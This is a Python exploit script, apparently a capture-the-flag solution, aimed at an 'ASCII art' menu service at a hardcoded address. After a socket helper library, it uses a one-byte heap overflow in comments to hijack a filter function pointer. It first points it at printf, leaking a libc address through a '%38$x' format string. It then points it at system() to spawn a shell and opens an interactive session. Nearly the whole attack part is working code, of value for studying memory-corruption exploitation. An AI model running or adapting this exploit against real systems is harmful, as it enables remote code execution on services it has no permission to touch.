#!/usr/bin/env python3
#coding: UTF-8

import codecs
import re
import select
import socket
import struct
import sys
import time

# Address of the challenge service as a (host, port) pair.
TARGET = (
    '188.40.18.80',
    1234,
)

#
# Helper Functions
#
def e(s):
    """Return the UTF-8 encoding of the text *s* as bytes."""
    return s.encode(encoding='UTF-8')

def d(s):
    """Return the text obtained by decoding the UTF-8 bytes *s*."""
    return s.decode(encoding='UTF-8')

def p(d, fmt='<I'):
    """Pack the value *d* into bytes using struct format *fmt*.

    The default format '<I' is a little-endian unsigned 32-bit integer.
    """
    packer = struct.Struct(fmt)
    return packer.pack(d)

def u(d, fmt='<I'):
    """Unpack the bytes *d* with struct format *fmt* and return the tuple of values."""
    unpacker = struct.Struct(fmt)
    return unpacker.unpack(d)

def u1(d, fmt='<I'):
    """Unpack the bytes *d* with struct format *fmt* and return only the first value."""
    values = struct.unpack(fmt, d)
    return values[0]

#
# Networking
#

# Default timeout in seconds for connecting and for each blocking receive.
DEFAULT_TIMEOUT = 5

# Custom exceptions raised by the Connection class.
# NOTE: these names shadow the Python 3 builtins of the same name inside this
# module, so `except ConnectionError` here does not catch builtin socket
# errors such as BrokenPipeError.
class ConnectionError(Exception):
    """Base error of Connection; raised directly when the remote end has closed."""


class TimeoutError(ConnectionError):
    """Raised when a receive operation times out."""


class Connection:
    """Connection abstraction built on top of raw sockets.

    Usable as a context manager: the socket is shut down and closed on exit.
    """

    def __init__(self, remote, local_port=0):
        """Connect to *remote* (a (host, port) pair).

        *local_port* binds the local side to that port; 0 lets the OS choose.
        Connecting uses DEFAULT_TIMEOUT.
        """
        self._socket = socket.create_connection(remote, DEFAULT_TIMEOUT, ('', local_port))

        # Disable Nagle's algorithm so small writes (single menu choices) are
        # sent immediately instead of being coalesced with later ones.
        self._socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, tb):
        self.disconnect()

    def disconnect(self):
        """Shut down and close the socket."""
        try:
            # This fails if the remote end already reset the connection; that
            # is harmless because the socket is closed right afterwards.
            self._socket.shutdown(socket.SHUT_RDWR)
        except OSError:
            pass
        self._socket.close()

    def recv(self, bufsize=4096, timeout=DEFAULT_TIMEOUT, dontraise=False):
        """Receive up to *bufsize* bytes from the remote end.

        Raises TimeoutError if nothing arrives within *timeout* seconds. If
        *dontraise* is true, b'' is returned instead of raising.
        Raises ConnectionError if the remote end has closed the connection.
        """
        self._socket.settimeout(timeout)
        try:
            data = self._socket.recv(bufsize)
        except socket.timeout:
            if dontraise:
                return b''
            raise TimeoutError('timed out') from None

        # socket.recv() returns an empty bytes object once the remote end is closed.
        if not data:
            raise ConnectionError('remote end closed')

        return data

    def recvln(self, n=1, timeout=DEFAULT_TIMEOUT):
        """Receive exactly *n* lines (up to and including the n-th b'\\n')."""
        buf = b''
        newlines = 0

        while newlines < n:
            # Read one byte at a time so nothing past the n-th newline is
            # consumed from the socket (it stays available to later reads).
            byte = self.recv(1, timeout)
            buf += byte
            if byte == b'\n':
                newlines += 1

        return buf

    def recv_until_found(self, keywords, timeout=DEFAULT_TIMEOUT):
        """Receive until any of the bytes *keywords* occurs; return everything received."""
        # Materialize once so a one-shot iterator can be checked on every pass.
        keywords = tuple(keywords)
        buf = b''

        while not any(kw in buf for kw in keywords):
            buf += self.recv(timeout=timeout)

        return buf

    def recv_until_match(self, regex, timeout=DEFAULT_TIMEOUT):
        """Receive text until *regex* (str or compiled pattern) matches; return the match.

        Incoming bytes are decoded as UTF-8.
        """
        if isinstance(regex, str):
            regex = re.compile(regex)
        # Decode incrementally: a multi-byte character split across two reads
        # would make a per-chunk decode raise UnicodeDecodeError.
        decoder = codecs.getincrementaldecoder('UTF-8')()
        buf = ''
        match = None

        while match is None:
            buf += decoder.decode(self.recv(timeout=timeout))
            match = regex.search(buf)

        return match

    def send(self, data):
        """Send all data to the remote end or raise an exception."""
        self._socket.sendall(data)

    def sendln(self, data):
        """Send all data to the remote end or raise an exception. Appends a \\n."""
        self.send(data + b'\n')

    def interact(self):
        """Relay between the remote end and the local terminal.

        Remote output is printed as it arrives; each line typed on stdin is sent
        to the remote end. Returns on Ctrl-C or when the remote end closes.
        """
        # Incremental decoding survives characters split across reads; bytes
        # that are not valid UTF-8 are shown as U+FFFD instead of crashing.
        decoder = codecs.getincrementaldecoder('UTF-8')(errors='replace')
        stdin_open = True
        try:
            while True:
                # flush: prompts like "$ " have no trailing newline.
                print(decoder.decode(self.recv(timeout=.05, dontraise=True)), end='', flush=True)
                if not stdin_open:
                    continue
                available, _, _ = select.select([sys.stdin], [], [], .05)
                if available:
                    data = sys.stdin.readline()
                    if data:
                        self.send(data.encode('UTF-8'))
                    else:
                        # EOF on stdin: select() would keep reporting it readable,
                        # so stop polling it but keep showing remote output.
                        stdin_open = False
        except KeyboardInterrupt:
            return
        except ConnectionError:
            # The remote end closed the connection.
            return


def connect(remote, local_port=0):
    """Factory function: open a Connection to *remote*, a (host, port) pair.

    *local_port* is forwarded to Connection to pin the local source port;
    the default 0 lets the OS choose, as before.
    """
    return Connection(remote, local_port)



#
# Exploit code
#

# Seconds to wait after every message sent to the service. Presumably this
# keeps consecutive inputs from being read together by the remote side.
pause = 3e-2

def new_ascii_art(c, content):
    """Create a new ASCII art whose text is the bytes *content*.

    Sends menu choice 1, then 0, then *content*, each newline-terminated and
    followed by a `pause`-second delay.
    """
    for line in (b'1', b'0', content):
        c.sendln(line)
        time.sleep(pause)

def new_comment(c, num, content):
    """Add a comment with raw bytes *content* to ASCII art number *num*.

    Menu path: 3 (presumably "select art") -> *num* -> 1 (new comment) ->
    *content* -> 0. *content* is sent WITHOUT a trailing newline; presumably
    the service reads a fixed-size buffer here, which the exploit payloads rely on.
    """
    steps = (
        (c.sendln, b'3'),
        (c.sendln, e(str(num))),
        (c.sendln, b'1'),
        (c.send, content),
        (c.sendln, b'0'),
    )
    for action, payload in steps:
        action(payload)
        time.sleep(pause)

def delete_all_comments(c, num):
    """Delete every comment of ASCII art number *num*.

    Menu path: 3 (presumably "select art") -> *num* -> 2 (delete all) -> 0.
    """
    for line in (b'3', e(str(num)), b'2', b'0'):
        c.sendln(line)
        time.sleep(pause)

def apply_filter(c, num):
    """Apply the filter to ASCII art number *num*.

    Menu path: 3 (presumably "select art") -> *num* -> 3 (apply filter) -> 0.
    """
    for line in (b'3', e(str(num)), b'3', b'0'):
        c.sendln(line)
        time.sleep(pause)

def quit(c):
    """Send top-level menu choice 0 (presumably "exit"), then wait `pause` seconds."""
    # NOTE: shadows the builtin quit(); the name is kept for existing callers.
    exit_choice = b'0'
    c.sendln(exit_choice)
    time.sleep(pause)

# Fixed address of printf in the target (presumably its PLT entry in a non-PIE
# binary; TODO confirm). Used as the first filter target to leak a stack value.
printf = 0x8048420

# libc offsets. The leaked stack value is presumably a return address 9 bytes
# into __libc_start_main; adding `offset` to it yields system()'s address.
off_system = 0x3E2B0
off_start_main = 0x19970 + 0x9
offset = off_system - off_start_main

def _hijack_filter(c, target):
    """Plant the 32-bit address *target* as art #2's filter, then apply that filter.

    Runs the corruption sequence shared by both stages. Comment 1 is re-created
    as 0xfb 'A' bytes plus one trailing byte (0x48, later 0x49), and comment 2
    receives p(target). Presumably the one-byte overflow corrupts heap state so
    that "apply filter" on art #2 calls *target* with the art text as its
    argument. TODO confirm against the binary.
    """
    delete_all_comments(c, 1)
    new_comment(c, 1, 0xfb * b'A' + b'\x48')
    new_comment(c, 2, p(target))
    delete_all_comments(c, 1)
    new_comment(c, 1, 0xfb * b'A' + b'\x49')
    c.recv()  # discard output received so far before triggering
    apply_filter(c, 2)


with connect(TARGET) as c:
    c.recv()  # discard whatever the service sends first

    # Stage 1: filter -> printf, so art #2's text acts as a format string and
    # "%38$x" prints a stack value in hex.
    print("exploiting 1st time: leaking addr of system...")
    new_ascii_art(c, b'blabla')
    new_comment(c, 1, b'lalalala')
    new_ascii_art(c, b'bash||%38$x')
    _hijack_filter(c, printf)

    # Raw string: '\|' in a plain literal is an invalid escape sequence
    # (DeprecationWarning; SyntaxWarning since Python 3.12).
    addr = int(c.recv_until_match(r"bash\|\|([0-9a-f]+)").group(1), 16)
    addr += offset
    print("system() @ 0x{:x}".format(addr))

    # Stage 2: filter -> system(), so art #2's text "bash||..." spawns a shell.
    print("exploiting 2nd time: calling into system()...")
    _hijack_filter(c, addr)

    # Confirm command execution before handing the terminal to the user.
    c.sendln(b'echo pwned')
    c.recv_until_found([b'pwned'])
    print("pwned!")
    c.interact()
